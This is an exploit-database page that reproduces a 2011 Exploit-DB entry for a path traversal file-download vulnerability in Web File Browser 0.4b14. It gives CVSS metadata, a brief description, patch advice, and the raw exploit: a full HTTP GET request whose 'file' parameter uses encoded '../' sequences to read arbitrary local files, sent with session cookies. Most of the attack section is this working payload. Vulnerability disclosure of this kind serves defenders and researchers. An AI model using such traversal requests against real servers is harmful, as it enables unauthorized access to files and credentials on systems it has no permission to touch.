header-logo
Suggest Exploit
vendor:
Web File Browser
by:
Sangyun YOO
8.8
CVSS
HIGH
File Download Vulnerability
22
CWE
Product Name: Web File Browser
Affected Version From: 0.4b14
Affected Version To: 0.4b14
Patch Exists: YES
Related CWE: N/A
CPE: a:web_file_browser:web_file_browser:0.4b14
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Starter K
2011

Web File Browser 0.4b14 File Download Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The request contains a maliciously crafted URL which contains the path of the local file which the attacker wants to download. The vulnerable server will then respond with the contents of the local file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

Exploit Title: [Web File Browser 0.4b14 File Download Vulnerability]
# Date: [2011/11/03]
# Author: [Sangyun YOO]
# Email: yoosy0302 at naver dot com
# Software Link: [ http://downloads.sourceforge.net/project/webfilebrowser/webfilebrowser/0.4b14/webfilebrowser-0.4b14.zip ]
# Version: [Web File Browser 0.4b14]
# Tested on: [Windows 7 Starter K]
---------------------------------------
 
Using Paros Tool Request Message to the modulation of the Request Line ==>
 
GET http://192.168.0.189/webFileBrowser.php?act=download&subdir=&sortby=name&file=..%2f..%2f..%2f..%2f..%2f[localfile] HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/msword, */*
Accept-Language: ko
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 192.168.0.189
Cookie: user=admin; loginkey=8d28703726be663cd5afb551bbb78be4; AJXP_LAST_KNOWN_VERSION=3.2.4; mx64B616EE8DEC99D3BFE053EAB04DC8=fcf2ad987a6db7670d4510ff9fa82a66; mx1B5F4F6EE7FC1C64773320E0BBE578=fe7c641b1a977587b5b6e0d355072a84; tab_usersconfig=0
 
 
===== Happy Hacking! =====

Navigation

Suggest Exploit

Services By CQR